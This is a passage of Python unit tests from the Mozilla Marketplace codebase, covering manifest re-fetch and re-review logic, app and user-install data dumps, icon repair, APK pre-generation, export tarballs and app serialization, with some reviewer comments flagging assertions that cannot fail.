    "name": "MozillaBall",
    "description": "Exciting Open Web development action!",
    "icons": {
        "16": "http://test.com/icon-16.png",
        "48": "http://test.com/icon-48.png",
        "128": "http://test.com/icon-128.png"
    },
    "installs_allowed_from": [
        "*",
    ],
    "locales": {
        "de": {
            "name": "Mozilla Kugel"
        },
        "fr": {
            "description": "Testing name-less locale"
        }
    },
    "developer": {
        "name": "Mozilla",
        "url": "http://www.mozilla.org/"
    }
}
# Content hashes corresponding to `original` (ohash) and `new` (nhash);
# TestUpdateManifest sets the mocked _get_content_hash to one of these to
# simulate an unchanged vs. changed manifest fetch.
ohash = ('sha256:'
         'fc11fba25f251d64343a7e8da4dfd812a57a121e61eb53c78c567536ab39b10d')
nhash = ('sha256:'
         '409fbe87dca5a4a7937e3dea27b69cb3a3d68caf39151585aef0c7ab46d8ee1e')
class TestUpdateManifest(amo.tests.TestCase):
    """Tests for the update_manifests task: re-fetching a hosted app's
    manifest, detecting changes, retry/notification behavior on failure,
    and flagging apps for re-review when sensitive fields change."""
    fixtures = ('base/platforms', 'base/users')
    def setUp(self):
        UserProfile.objects.get_or_create(id=settings.TASK_USER_ID)
        # Not using app factory since it creates translations with an invalid
        # locale of "en-us".
        self.addon = Addon.objects.create(type=amo.ADDON_WEBAPP)
        self.version = Version.objects.create(addon=self.addon,
                                              _developer_name='Mozilla')
        self.file = File.objects.create(
            version=self.version, hash=ohash, status=amo.STATUS_PUBLIC,
            filename='%s-%s' % (self.addon.id, self.version.id))
        self.addon.name = {
            'en-US': 'MozillaBall',
            'de': 'Mozilla Kugel',
        }
        self.addon.status = amo.STATUS_PUBLIC
        self.addon.manifest_url = 'http://nowhere.allizom.org/manifest.webapp'
        self.addon.save()
        self.addon.addonuser_set.create(user_id=999)
        # Store the module-level `original` manifest as the on-disk copy.
        with storage.open(self.file.file_path, 'w') as fh:
            fh.write(json.dumps(original))
        # This is the hash to set the get_content_hash to, for showing
        # that the webapp has been updated.
        self._hash = nhash
        # Let's use deepcopy so nested dicts are copied as new objects.
        self.new = deepcopy(new)
        self.content_type = 'application/x-web-app-manifest+json'
        # Mock the HTTP fetch of the manifest so tests control the response.
        req_patcher = mock.patch('mkt.developers.tasks.requests.get')
        self.req_mock = req_patcher.start()
        self.addCleanup(req_patcher.stop)
        self.response_mock = mock.Mock(status_code=200)
        self.response_mock.iter_content.return_value = mock.Mock(
            next=self._data)
        self.response_mock.headers = {'content-type': self.content_type}
        self.req_mock.return_value = self.response_mock
        # Mock the validator; default to a clean (empty) validation result.
        validator_patcher = mock.patch('mkt.webapps.tasks.validator')
        self.validator = validator_patcher.start()
        self.addCleanup(validator_patcher.stop)
        self.validator.return_value = {}
    @mock.patch('mkt.webapps.tasks._get_content_hash')
    def _run(self, _get_content_hash, **kw):
        # Will run the task and will act depending upon how you've set hash.
        _get_content_hash.return_value = self._hash
        update_manifests(ids=(self.addon.pk,), **kw)
    def _data(self):
        # Serves as the mocked response body: the (possibly mutated) manifest.
        return json.dumps(self.new)
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    @mock.patch('mkt.webapps.models.copy_stored_file')
    def test_new_version_not_created(self, _copy_stored_file, _manifest_json):
        # Test that update_manifest doesn't create multiple versions/files.
        eq_(self.addon.versions.count(), 1)
        old_version = self.addon.current_version
        old_file = self.addon.get_latest_file()
        self._run()
        app = Webapp.objects.get(pk=self.addon.pk)
        version = app.current_version
        file_ = app.get_latest_file()
        # Test that our new version looks good.
        eq_(app.versions.count(), 1)
        eq_(version, old_version, 'Version created')
        eq_(file_, old_file, 'File created')
        path = FileUpload.objects.all()[0].path
        _copy_stored_file.assert_called_with(path,
                                             os.path.join(version.path_prefix,
                                                          file_.filename))
        _manifest_json.assert_called_with(file_)
    @mock.patch('mkt.developers.tasks.validator', lambda uid, **kw: None)
    def test_version_updated(self):
        # A manifest version bump should update the stored version string.
        self._run()
        self.new['version'] = '1.1'
        self._hash = 'foo'
        self._run()
        app = Webapp.objects.get(pk=self.addon.pk)
        eq_(app.versions.latest().version, '1.1')
    def test_not_log(self):
        # Unchanged hash: no update performed, so no activity logged.
        self._hash = ohash
        self._run()
        eq_(ActivityLog.objects.for_apps(self.addon).count(), 0)
    def test_log(self):
        # Changed hash: the manifest update is logged once.
        self._run()
        eq_(ActivityLog.objects.for_apps(self.addon).count(), 1)
    @mock.patch('mkt.webapps.tasks._update_manifest')
    def test_ignore_not_webapp(self, mock_):
        self.addon.update(type=amo.ADDON_EXTENSION)
        call_command('process_addons', task='update_manifests')
        assert not mock_.called
    @mock.patch('mkt.webapps.tasks._update_manifest')
    def test_pending(self, mock_):
        self.addon.update(status=amo.STATUS_PENDING)
        call_command('process_addons', task='update_manifests')
        assert mock_.called
    @mock.patch('mkt.webapps.tasks._update_manifest')
    def test_waiting(self, mock_):
        self.addon.update(status=amo.STATUS_PUBLIC_WAITING)
        call_command('process_addons', task='update_manifests')
        assert mock_.called
    @mock.patch('mkt.webapps.tasks._update_manifest')
    def test_ignore_disabled(self, mock_):
        self.addon.update(status=amo.STATUS_DISABLED)
        call_command('process_addons', task='update_manifests')
        assert not mock_.called
    @mock.patch('mkt.webapps.tasks._update_manifest')
    def test_ignore_packaged(self, mock_):
        # Packaged apps have no remote manifest to re-fetch.
        self.addon.update(is_packaged=True)
        call_command('process_addons', task='update_manifests')
        assert not mock_.called
    @mock.patch('mkt.webapps.tasks._update_manifest')
    def test_get_webapp(self, mock_):
        eq_(self.addon.status, amo.STATUS_PUBLIC)
        call_command('process_addons', task='update_manifests')
        assert mock_.called
    @mock.patch('mkt.webapps.tasks._fetch_manifest')
    @mock.patch('mkt.webapps.tasks.update_manifests.retry')
    def test_update_manifest(self, retry, fetch):
        # A successful fetch must not schedule a retry.
        fetch.return_value = '{}'
        update_manifests(ids=(self.addon.pk,))
        assert not retry.called
    @mock.patch('mkt.webapps.tasks._fetch_manifest')
    @mock.patch('mkt.webapps.tasks.update_manifests.retry')
    def test_manifest_fetch_fail(self, retry, fetch):
        # First fetch failure: retried in ~1 hour with a per-app retry count.
        later = datetime.datetime.now() + datetime.timedelta(seconds=3600)
        fetch.side_effect = RuntimeError
        update_manifests(ids=(self.addon.pk,))
        retry.assert_called()
        # Not using assert_called_with b/c eta is a datetime.
        eq_(retry.call_args[1]['args'], ([self.addon.pk],))
        eq_(retry.call_args[1]['kwargs'], {'check_hash': True,
                                           'retries': {self.addon.pk: 1}})
        self.assertCloseToNow(retry.call_args[1]['eta'], later)
        eq_(retry.call_args[1]['max_retries'], 5)
        eq_(len(mail.outbox), 0)
    def test_notify_failure_lang(self):
        # Each developer is emailed in their own language (app name is
        # localized: "Mozilla Kugel" for de, "MozillaBall" for en).
        user1 = UserProfile.objects.get(pk=999)
        user2 = UserProfile.objects.get(pk=10482)
        AddonUser.objects.create(addon=self.addon, user=user2)
        user1.update(lang='de')
        user2.update(lang='en')
        notify_developers_of_failure(self.addon, 'blah')
        eq_(len(mail.outbox), 2)
        ok_(u'Mozilla Kugel' in mail.outbox[0].subject)
        ok_(u'MozillaBall' in mail.outbox[1].subject)
    def test_notify_failure_with_rereview(self):
        # Apps already flagged for re-review don't get failure emails.
        RereviewQueue.flag(self.addon, amo.LOG.REREVIEW_MANIFEST_CHANGE,
                           'This app is flagged!')
        notify_developers_of_failure(self.addon, 'blah')
        eq_(len(mail.outbox), 0)
    def test_notify_failure_not_public(self):
        # Non-public apps don't get failure emails either.
        self.addon.update(status=amo.STATUS_PENDING)
        notify_developers_of_failure(self.addon, 'blah')
        eq_(len(mail.outbox), 0)
    @mock.patch('mkt.webapps.tasks._fetch_manifest')
    @mock.patch('mkt.webapps.tasks.update_manifests.retry')
    def test_manifest_fetch_3rd_attempt(self, retry, fetch):
        fetch.side_effect = RuntimeError
        update_manifests(ids=(self.addon.pk,), retries={self.addon.pk: 2})
        # We already tried twice before, this is the 3rd attempt,
        # We should notify the developer that something is wrong.
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        ok_(msg.subject.startswith('Issue with your app'))
        expected = u'Failed to get manifest from %s' % self.addon.manifest_url
        ok_(expected in msg.body)
        ok_(settings.MKT_SUPPORT_EMAIL in msg.body)
        # We should have scheduled a retry.
        assert retry.called
        # We shouldn't have put the app in the rereview queue yet.
        assert not RereviewQueue.objects.filter(addon=self.addon).exists()
    @mock.patch('mkt.webapps.tasks._fetch_manifest')
    @mock.patch('mkt.webapps.tasks.update_manifests.retry')
    @mock.patch('mkt.webapps.tasks.notify_developers_of_failure')
    def test_manifest_fetch_4th_attempt(self, notify, retry, fetch):
        fetch.side_effect = RuntimeError
        update_manifests(ids=(self.addon.pk,), retries={self.addon.pk: 3})
        # We already tried 3 times before, this is the 4th and last attempt,
        # we shouldn't retry anymore, instead we should just add the app to
        # the re-review queue. We shouldn't notify the developer either at this
        # step, it should have been done before already.
        assert not notify.called
        assert not retry.called
        assert RereviewQueue.objects.filter(addon=self.addon).exists()
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    def test_manifest_validation_failure(self, _iarc):
        # We are already mocking validator, but this test needs to make sure
        # it actually saves our custom validation result, so add that.
        def side_effect(upload_id, **kwargs):
            upload = FileUpload.objects.get(pk=upload_id)
            upload.validation = json.dumps(validation_results)
            upload.save()
        validation_results = {
            'errors': 1,
            'messages': [{
                'context': None,
                'uid': 'whatever',
                'column': None,
                'id': ['webapp', 'detect_webapp', 'parse_error'],
                'file': '',
                'tier': 1,
                'message': 'JSON Parse Error',
                'type': 'error',
                'line': None,
                'description': 'The webapp extension could not be parsed due '
                               'to a syntax error in the JSON.'
            }]
        }
        self.validator.side_effect = side_effect
        eq_(RereviewQueue.objects.count(), 0)
        self._run()
        # Validation failure flags the app and emails the developer with a
        # link to the validation results.
        eq_(RereviewQueue.objects.count(), 1)
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        upload = FileUpload.objects.get()
        validation_url = absolutify(reverse(
            'mkt.developers.upload_detail', args=[upload.uuid]))
        ok_(msg.subject.startswith('Issue with your app'))
        ok_(validation_results['messages'][0]['message'] in msg.body)
        ok_(validation_url in msg.body)
        ok_(not _iarc.called)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_manifest_name_change_rereview(self, _manifest, _iarc):
        # Mock original manifest file lookup.
        _manifest.return_value = original
        # Mock new manifest with name change.
        self.new['name'] = 'Mozilla Ball Ultimate Edition'
        eq_(RereviewQueue.objects.count(), 0)
        self._run()
        eq_(RereviewQueue.objects.count(), 1)
        # 2 logs: 1 for manifest update, 1 for re-review trigger.
        eq_(ActivityLog.objects.for_apps(self.addon).count(), 2)
        ok_(_iarc.called)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_manifest_locale_name_add_rereview(self, _manifest, _iarc):
        # Mock original manifest file lookup.
        _manifest.return_value = original
        # Mock new manifest with name change.
        self.new['locales'] = {'es': {'name': 'eso'}}
        eq_(RereviewQueue.objects.count(), 0)
        self._run()
        eq_(RereviewQueue.objects.count(), 1)
        # 2 logs: 1 for manifest update, 1 for re-review trigger.
        eq_(ActivityLog.objects.for_apps(self.addon).count(), 2)
        log = ActivityLog.objects.filter(
            action=amo.LOG.REREVIEW_MANIFEST_CHANGE.id)[0]
        eq_(log.details.get('comments'),
            u'Locales added: "eso" (es).')
        ok_(not _iarc.called)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_manifest_locale_name_change_rereview(self, _manifest, _iarc):
        # Mock original manifest file lookup.
        _manifest.return_value = original
        # Mock new manifest with name change.
        self.new['locales'] = {'de': {'name': 'Bippity Bop'}}
        eq_(RereviewQueue.objects.count(), 0)
        self._run()
        eq_(RereviewQueue.objects.count(), 1)
        # 2 logs: 1 for manifest update, 1 for re-review trigger.
        eq_(ActivityLog.objects.for_apps(self.addon).count(), 2)
        log = ActivityLog.objects.filter(
            action=amo.LOG.REREVIEW_MANIFEST_CHANGE.id)[0]
        eq_(log.details.get('comments'),
            u'Locales updated: "Mozilla Kugel" -> "Bippity Bop" (de).')
        ok_(not _iarc.called)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_manifest_default_locale_change(self, _manifest, _iarc):
        # Mock original manifest file lookup.
        _manifest.return_value = original
        # Mock new manifest with name change.
        self.new['name'] = u'Mozilla Balón'
        self.new['default_locale'] = 'es'
        self.new['locales'] = {'en-US': {'name': 'MozillaBall'}}
        eq_(RereviewQueue.objects.count(), 0)
        self._run()
        eq_(RereviewQueue.objects.count(), 1)
        eq_(self.addon.reload().default_locale, 'es')
        # 2 logs: 1 for manifest update, 1 for re-review trigger.
        eq_(ActivityLog.objects.for_apps(self.addon).count(), 2)
        log = ActivityLog.objects.filter(
            action=amo.LOG.REREVIEW_MANIFEST_CHANGE.id)[0]
        eq_(log.details.get('comments'),
            u'Manifest name changed from "MozillaBall" to "Mozilla Balón". '
            u'Default locale changed from "en-US" to "es". '
            u'Locales added: "Mozilla Balón" (es).')
        ok_(_iarc.called)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_manifest_locale_name_removal_no_rereview(self, _manifest, _iarc):
        # Mock original manifest file lookup.
        _manifest.return_value = original
        # Mock new manifest with name change.
        # Note: Not using `del` b/c copy doesn't copy nested structures.
        self.new['locales'] = {
            'fr': {'description': 'Testing name-less locale'}
        }
        eq_(RereviewQueue.objects.count(), 0)
        self._run()
        # Removing a locale name does not trigger re-review.
        eq_(RereviewQueue.objects.count(), 0)
        # Log for manifest update.
        eq_(ActivityLog.objects.for_apps(self.addon).count(), 1)
        ok_(not _iarc.called)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_force_rereview(self, _manifest, _iarc):
        # Mock original manifest file lookup.
        _manifest.return_value = original
        # Mock new manifest with name change.
        self.new['name'] = 'Mozilla Ball Ultimate Edition'
        # We're setting the hash to the same value.
        self.file.update(hash=nhash)
        eq_(RereviewQueue.objects.count(), 0)
        self._run(check_hash=False)
        # We should still get a rereview since we bypassed the manifest check.
        eq_(RereviewQueue.objects.count(), 1)
        # 2 logs: 1 for manifest update, 1 for re-review trigger.
        eq_(ActivityLog.objects.for_apps(self.addon).count(), 2)
        ok_(_iarc.called)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_manifest_support_locales_change(self, _manifest, _iarc):
        # Mock original manifest file lookup.
        _manifest.return_value = original
        # Mock new manifest with name change.
        self.new['locales'].update({'es': {'name': u'Mozilla Balón'}})
        self._run()
        ver = self.version.reload()
        eq_(ver.supported_locales, 'de,es,fr')
        ok_(not _iarc.called)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_manifest_support_developer_change(self, _manifest, _iarc):
        # Mock original manifest file lookup.
        _manifest.return_value = original
        # Mock new manifest with developer name change.
        self.new['developer']['name'] = 'Allizom'
        self._run()
        ver = self.version.reload()
        eq_(ver.developer_name, 'Allizom')
        # We should get a re-review because of the developer name change.
        eq_(RereviewQueue.objects.count(), 1)
        # 2 logs: 1 for manifest update, 1 for re-review trigger.
        eq_(ActivityLog.objects.for_apps(self.addon).count(), 2)
        ok_(_iarc.called)
class TestDumpApps(amo.tests.TestCase):
    """Tests for dump_app / zip_apps and the dump_apps management task."""
    fixtures = fixture('webapp_337141')
    def test_dump_app(self):
        # dump_app returns the path of the JSON file it wrote.
        fn = dump_app(337141)
        result = json.load(open(fn, 'r'))
        eq_(result['id'], 337141)
    def test_zip_apps(self):
        # zip_apps bundles the dump plus license/readme and returns the
        # archive path; the archive must be non-empty.
        dump_app(337141)
        fn = zip_apps()
        for f in ['license.txt', 'readme.txt']:
            ok_(os.path.exists(os.path.join(settings.DUMPED_APPS_PATH, f)))
        ok_(os.stat(fn)[stat.ST_SIZE])
    @mock.patch('mkt.webapps.tasks.dump_app')
    def test_not_public(self, dump_app):
        # Non-public apps are never dumped.
        app = Addon.objects.get(pk=337141)
        app.update(status=amo.STATUS_PENDING)
        call_command('process_addons', task='dump_apps')
        assert not dump_app.called
    def test_removed(self):
        # A previously-dumped app's file is removed once it goes non-public.
        # At least one public app must exist for dump_apps to run.
        amo.tests.app_factory(name='second app', status=amo.STATUS_PUBLIC)
        app_path = os.path.join(settings.DUMPED_APPS_PATH, 'apps', '337',
                                '337141.json')
        app = Addon.objects.get(pk=337141)
        app.update(status=amo.STATUS_PUBLIC)
        call_command('process_addons', task='dump_apps')
        assert os.path.exists(app_path)
        app.update(status=amo.STATUS_PENDING)
        call_command('process_addons', task='dump_apps')
        assert not os.path.exists(app_path)
    @mock.patch('mkt.webapps.tasks.dump_app')
    def test_public(self, dump_app):
        call_command('process_addons', task='dump_apps')
        assert dump_app.called
class TestDumpUserInstalls(amo.tests.TestCase):
    """Tests for dump_user_installs: users are anonymized in the dump via
    sha256(user pk + SECRET_KEY)."""
    fixtures = fixture('user_2519', 'webapp_337141')
    def setUp(self):
        # Create a user install.
        self.app = Webapp.objects.get(pk=337141)
        self.user = UserProfile.objects.get(pk=2519)
        self.app.installed.create(user=self.user)
        # The dump file is sharded by the first hex digit of the user hash.
        self.hash = hashlib.sha256('%s%s' % (str(self.user.pk),
                                             settings.SECRET_KEY)).hexdigest()
        self.path = os.path.join(settings.DUMPED_USERS_PATH, 'users',
                                 self.hash[0], '%s.json' % self.hash)
    def dump_and_load(self):
        # Run the task for our user and load the JSON file it wrote.
        dump_user_installs([self.user.pk])
        return json.load(open(self.path, 'r'))
    def test_dump_user_installs(self):
        data = self.dump_and_load()
        eq_(data['user'], self.hash)
        eq_(data['region'], self.user.region)
        eq_(data['lang'], self.user.lang)
        installed = data['installed_apps'][0]
        eq_(installed['id'], self.app.id)
        eq_(installed['slug'], self.app.app_slug)
        self.assertCloseToNow(
            datetime.datetime.strptime(installed['installed'],
                                       '%Y-%m-%dT%H:%M:%S'),
            datetime.datetime.utcnow())
    # NOTE(review): method name has a typo ("exludes"); left untouched since
    # test runners discover tests by name.
    def test_dump_exludes_deleted(self):
        """We can't recommend deleted apps, so don't include them."""
        app = amo.tests.app_factory()
        app.installed.create(user=self.user)
        app.delete()
        data = self.dump_and_load()
        eq_(len(data['installed_apps']), 1)
        installed = data['installed_apps'][0]
        eq_(installed['id'], self.app.id)
class TestFixMissingIcons(amo.tests.TestCase):
    """Tests for the fix_missing_icons process_addons task: which app
    statuses it runs for, and its missing-icon detection path."""
    fixtures = fixture('webapp_337141')
    def setUp(self):
        self.app = Webapp.objects.get(pk=337141)
    @mock.patch('mkt.webapps.tasks._fix_missing_icons')
    def test_ignore_not_webapp(self, mock_):
        self.app.update(type=amo.ADDON_EXTENSION)
        call_command('process_addons', task='fix_missing_icons')
        assert not mock_.called
    @mock.patch('mkt.webapps.tasks._fix_missing_icons')
    def test_pending(self, mock_):
        self.app.update(status=amo.STATUS_PENDING)
        call_command('process_addons', task='fix_missing_icons')
        assert mock_.called
    @mock.patch('mkt.webapps.tasks._fix_missing_icons')
    def test_public_waiting(self, mock_):
        self.app.update(status=amo.STATUS_PUBLIC_WAITING)
        call_command('process_addons', task='fix_missing_icons')
        assert mock_.called
    @mock.patch('mkt.webapps.tasks._fix_missing_icons')
    def test_ignore_disabled(self, mock_):
        self.app.update(status=amo.STATUS_DISABLED)
        call_command('process_addons', task='fix_missing_icons')
        assert not mock_.called
    @mock.patch('mkt.webapps.tasks.fetch_icon')
    @mock.patch('mkt.webapps.tasks._log')
    @mock.patch('mkt.webapps.tasks.storage.exists')
    def test_for_missing_size(self, exists, _log, fetch_icon):
        exists.return_value = False
        call_command('process_addons', task='fix_missing_icons')
        # We are checking two sizes, but since the 64 has already failed for
        # this app, we should only have called exists() once, and we should
        # never have logged that the 128 icon is missing.
        eq_(exists.call_count, 1)
        # NOTE(review): Mock has no `any_call` method -- attribute access on
        # a Mock auto-creates a child mock, so both asserts below return a
        # truthy Mock and can never fail. The intent looks like
        # `_log.assert_any_call(...)` (and presumably a *negated* check for
        # the 128 size, per the comment above) -- confirm before changing.
        assert _log.any_call(337141, 'Webapp is missing icon size 64')
        assert _log.any_call(337141, 'Webapp is missing icon size 128')
        assert fetch_icon.called
class TestRegenerateIconsAndThumbnails(amo.tests.TestCase):
    """The regenerate_icons_and_thumbnails task should re-thumbnail each
    existing preview without regenerating the source image."""
    fixtures = fixture('webapp_337141')

    @mock.patch('mkt.webapps.tasks.resize_preview.delay')
    def test_command(self, resize_preview):
        # Attach a single preview to the fixture app.
        pv = Preview.objects.create(addon_id=337141, filetype='image/png')
        call_command('process_addons', task='regenerate_icons_and_thumbnails')
        # Only the thumbnail is rebuilt (generate_image=False).
        resize_preview.assert_called_once_with(pv.image_path, pv,
                                               generate_image=False)
@mock.patch('mkt.webapps.tasks.requests')
class TestPreGenAPKs(amo.tests.WebappTestCase):
    """Tests for the pre_generate_apk task that asks the APK factory to
    build an APK for an app."""
    def setUp(self):
        super(TestPreGenAPKs, self).setUp()
        self.manifest_url = 'http://some-app.net/manifest.webapp'
        self.app.update(manifest_url=self.manifest_url)
    def test_get(self, req):
        res = mock.Mock()
        req.get.return_value = res
        pre_generate_apk.delay(self.app.id)
        assert req.get.called, 'APK requested from factory'
        # NOTE(review): mock_calls[0] is a `_Call` object, not a string;
        # `.startswith(...)` auto-creates a child call and returns a truthy
        # `_Call`, so this assertion can never fail. Probably meant to check
        # str(req.get.mock_calls[0]) or req.get.call_args -- confirm intent.
        assert req.get.mock_calls[0].startswith(
            settings.PRE_GENERATE_APK_URL), req.get.mock_calls
        assert res.raise_for_status.called, 'raise on bad status codes'
    def test_get_packaged(self, req):
        # Packaged apps have no manifest URL but can still get an APK.
        self.app.update(manifest_url=None, is_packaged=True)
        # Make sure this doesn't raise an exception.
        pre_generate_apk.delay(self.app.id)
        assert req.get.called, 'APK requested from factory'
    def test_no_manifest(self, req):
        # A hosted app without a manifest URL cannot be built.
        self.app.update(manifest_url=None)
        with self.assertRaises(PreGenAPKError):
            pre_generate_apk.delay(self.app.id)
    def test_error_getting(self, req):
        # Network errors from the factory surface as PreGenAPKError.
        req.get.side_effect = RequestException
        with self.assertRaises(PreGenAPKError):
            pre_generate_apk.delay(self.app.id)
class TestExportData(amo.tests.TestCase):
    """Exercise the export_data task: tarball creation and its contents."""
    fixtures = fixture('webapp_337141', 'collection_81721')

    def setUp(self):
        # Each test writes its dump into a throwaway directory.
        self.export_directory = mkdtemp()
        self.collection_path = 'collections/81/81721.json'
        self.app_path = 'apps/337/337141.json'

    def tearDown(self):
        rm_directory(self.export_directory)

    def create_export(self, name):
        """Run export_data into the temp dir and open the resulting tarball."""
        with self.settings(DUMPED_APPS_PATH=self.export_directory):
            export_data(name=name)
        archive_path = os.path.join(self.export_directory, 'tarballs',
                                    name + '.tgz')
        return tarfile.open(archive_path)

    def test_export_is_created(self):
        # The tarball contains the app dump, the collection dump, and the
        # license/readme boilerplate.
        archive = self.create_export('tarball-name')
        members = archive.getnames()
        for wanted in (self.collection_path, self.app_path,
                       'license.txt', 'readme.txt'):
            assert wanted in members, wanted

    def test_collections_point_to_apps(self):
        # Collection entries reference app dumps by their in-archive path.
        archive = self.create_export('tarball-name')
        payload = json.loads(archive.extractfile(self.collection_path).read())
        eq_(payload['apps'][0]['filepath'], self.app_path)
########NEW FILE########
__FILENAME__ = test_utils_
# -*- coding: utf-8 -*-
import json
from decimal import Decimal
from django.core.urlresolvers import reverse
import mock
from elasticutils.contrib.django import S
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo
import amo.tests
from addons.models import AddonCategory, AddonDeviceType, Category, Preview
import mkt
from mkt.constants import ratingsbodies, regions
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.search.serializers import ESAppSerializer
from mkt.site.fixtures import fixture
from mkt.webapps.models import Installed, Webapp, WebappIndexer
from mkt.webapps.serializers import AppSerializer
from mkt.webapps.utils import (dehydrate_content_rating,
get_supported_locales)
from mkt.prices.models import PriceCurrency
from users.models import UserProfile
from versions.models import Version
class TestAppSerializer(amo.tests.TestCase):
    """Tests for AppSerializer output: previews, prices, per-user flags,
    locales, regions, versions, content ratings, release notes, upsells."""
    fixtures = fixture('user_2519')
    def setUp(self):
        self.create_switch('iarc')
        self.app = amo.tests.app_factory(version_kw={'version': '1.8'})
        self.profile = UserProfile.objects.get(pk=2519)
        self.request = RequestFactory().get('/')
    def serialize(self, app, profile=None):
        # Serialize `app` as seen by `profile` (None means anonymous).
        self.request.amo_user = profile
        a = AppSerializer(instance=app, context={'request': self.request})
        return a.data
    def test_no_previews(self):
        eq_(self.serialize(self.app)['previews'], [])
    def test_with_preview(self):
        obj = Preview.objects.create(**{
            'filetype': 'image/png', 'thumbtype': 'image/png',
            'addon': self.app})
        preview = self.serialize(self.app)['previews'][0]
        self.assertSetEqual(preview, ['filetype', 'id', 'image_url',
                                      'thumbnail_url', 'resource_uri'])
        eq_(int(preview['id']), obj.pk)
    def test_no_rating(self):
        eq_(self.serialize(self.app)['content_ratings']['rating'], None)
    def test_no_price(self):
        res = self.serialize(self.app)
        eq_(res['price'], None)
        eq_(res['price_locale'], None)
        eq_(res['payment_required'], False)
    def check_profile(self, profile, **kw):
        # Helper: assert the per-user dict, overriding defaults via kwargs.
        expected = {'developed': False, 'installed': False, 'purchased': False}
        expected.update(**kw)
        eq_(profile, expected)
    def test_installed(self):
        self.app.installed.create(user=self.profile)
        res = self.serialize(self.app, profile=self.profile)
        self.check_profile(res['user'], installed=True)
    def test_purchased(self):
        self.app.addonpurchase_set.create(user=self.profile)
        res = self.serialize(self.app, profile=self.profile)
        self.check_profile(res['user'], purchased=True)
    def test_owned(self):
        self.app.addonuser_set.create(user=self.profile)
        res = self.serialize(self.app, profile=self.profile)
        self.check_profile(res['user'], developed=True)
    def test_locales(self):
        res = self.serialize(self.app)
        eq_(res['default_locale'], 'en-US')
        eq_(res['supported_locales'], [])
    def test_multiple_locales(self):
        self.app.current_version.update(supported_locales='en-US,it')
        res = self.serialize(self.app)
        self.assertSetEqual(res['supported_locales'], ['en-US', 'it'])
    def test_regions(self):
        res = self.serialize(self.app)
        self.assertSetEqual([region['slug'] for region in res['regions']],
                            [region.slug for region in self.app.get_regions()])
    def test_current_version(self):
        res = self.serialize(self.app)
        ok_('current_version' in res)
        eq_(res['current_version'], self.app.current_version.version)
    def test_versions_one(self):
        res = self.serialize(self.app)
        self.assertSetEqual([v.version for v in self.app.versions.all()],
                            res['versions'].keys())
    def test_versions_multiple(self):
        ver = Version.objects.create(addon=self.app, version='1.9')
        self.app.update(_current_version=ver, _latest_version=ver)
        res = self.serialize(self.app)
        eq_(res['current_version'], ver.version)
        self.assertSetEqual([v.version for v in self.app.versions.all()],
                            res['versions'].keys())
    def test_categories(self):
        cat1 = Category.objects.create(type=amo.ADDON_WEBAPP, slug='cat1')
        cat2 = Category.objects.create(type=amo.ADDON_WEBAPP, slug='cat2')
        AddonCategory.objects.create(addon=self.app, category=cat1)
        AddonCategory.objects.create(addon=self.app, category=cat2)
        res = self.serialize(self.app)
        self.assertSetEqual(res['categories'], ['cat1', 'cat2'])
    def test_content_ratings(self):
        # The serialized rating body depends on the request region:
        # generic by default, CLASSIND when the request region is Brazil.
        self.app.set_content_ratings({
            ratingsbodies.CLASSIND: ratingsbodies.CLASSIND_18,
            ratingsbodies.GENERIC: ratingsbodies.GENERIC_18,
        })
        res = self.serialize(self.app)
        eq_(res['content_ratings']['body'], 'generic')
        eq_(res['content_ratings']['rating'], '18')
        self.request.REGION = mkt.regions.BR
        res = self.serialize(self.app)
        eq_(res['content_ratings']['body'], 'classind')
        eq_(res['content_ratings']['rating'], '18')
    def test_content_descriptors(self):
        # Only descriptors for the request region's body (ESRB for US)
        # should be serialized; the PEGI one is filtered out.
        self.app.set_descriptors(['has_esrb_blood', 'has_esrb_crime',
                                  'has_pegi_scary'])
        self.request.REGION = mkt.regions.US
        res = self.serialize(self.app)
        self.assertSetEqual(res['content_ratings']['descriptors'],
                            ['blood', 'crime'])
    def test_interactive_elements(self):
        self.app.set_interactives(['has_digital_purchases', 'has_shares_info'])
        res = self.serialize(self.app)
        self.assertSetEqual(
            res['content_ratings']['interactives'],
            ['shares-info', 'digital-purchases'])
    def test_dehydrate_content_rating_old_es(self):
        """Test dehydrate works with old ES mapping."""
        rating = dehydrate_content_rating(
            [json.dumps({'body': u'CLASSIND',
                         'slug': u'0',
                         'description': u'General Audiences',
                         'name': u'0+',
                         'body_slug': u'classind'})])
        eq_(rating, {})
    def test_no_release_notes(self):
        res = self.serialize(self.app)
        eq_(res['release_notes'], None)
        # Still None once the app has no current version at all.
        self.app.current_version.delete()
        self.app.update_version()
        eq_(self.app.current_version, None)
        res = self.serialize(self.app)
        eq_(res['release_notes'], None)
    def test_release_notes(self):
        # Without a requested lang the notes come back as a translations
        # dict; with ?lang=... they collapse to a single string.
        version = self.app.current_version
        version.releasenotes = u'These are nötes.'
        version.save()
        res = self.serialize(self.app)
        eq_(res['release_notes'], {u'en-US': unicode(version.releasenotes)})
        self.request = RequestFactory().get('/?lang=whatever')
        res = self.serialize(self.app)
        eq_(res['release_notes'], unicode(version.releasenotes))
    def test_upsell(self):
        self.request.REGION = mkt.regions.US
        upsell = amo.tests.app_factory()
        self.make_premium(upsell)
